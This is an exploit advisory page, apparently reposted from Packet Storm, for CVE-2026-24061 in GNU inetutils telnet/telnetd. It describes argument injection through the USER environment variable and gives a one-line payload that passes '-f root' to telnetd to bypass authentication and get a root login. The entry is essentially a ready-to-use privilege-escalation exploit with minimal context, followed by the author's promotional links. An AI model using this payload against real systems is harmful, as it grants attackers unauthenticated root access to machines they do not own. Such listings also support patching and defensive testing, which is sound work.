Share
## https://sploitus.com/exploit?id=PACKETSTORM:214347
# Titles: Telnet Argument Injection Privilege Escalation - RCE
    # Author: nu11secur1ty
    # Date: 1/24/2026
    # Vendor: https://www.gnu.org/software/inetutils/
    # Software: https://www.gnu.org/software/inetutils/
    # Reference:
    https://nsfocusglobal.com/gnu-inetutils-telnetd-remote-authentication-bypass-vulnerability-cve-2026-24061-notice/
    # CVE-2026-24061
    
    ## Description:
    Argument/Command Injection via the USER environment variable in the
    inetutils telnet client (version 1.9-4+deb10u2 and earlier). The client
    improperly passes the USER environment variable contents as command-line
    arguments to the telnet daemon (telnetd).
    
    STATUS:
    CRITICAL
    
    ## Affected Versions:
    - inetutils-telnet 1.9-4+deb10u2 and earlier
    - Debian 10 (buster) and derivatives
    - Possibly other distributions with similar versions
    
    # Attack Vector:
    Network/Adjacent (requires telnet access)
    CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
    
    [+]Payload:
    
    ```
    USER="-f root" telnet -a 127.0.0.1 2323
    ```
    
    # Demo:
    [href](https://www.patreon.com/posts/telnet-argument-148994220)
    
    # Time spent:
    00:01:35
    
    
    --
    System Administrator - Infrastructure Engineer
    Penetration Testing Engineer
    Exploit developer at https://packetstormsecurity.com/
    https://cve.mitre.org/index.html
    https://cxsecurity.com/ and https://www.exploit-db.com/
    home page: https://www.asc3t1c-nu11secur1ty.com/
    hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
    nu11secur1ty <https://www.asc3t1c-nu11secur1ty.com/>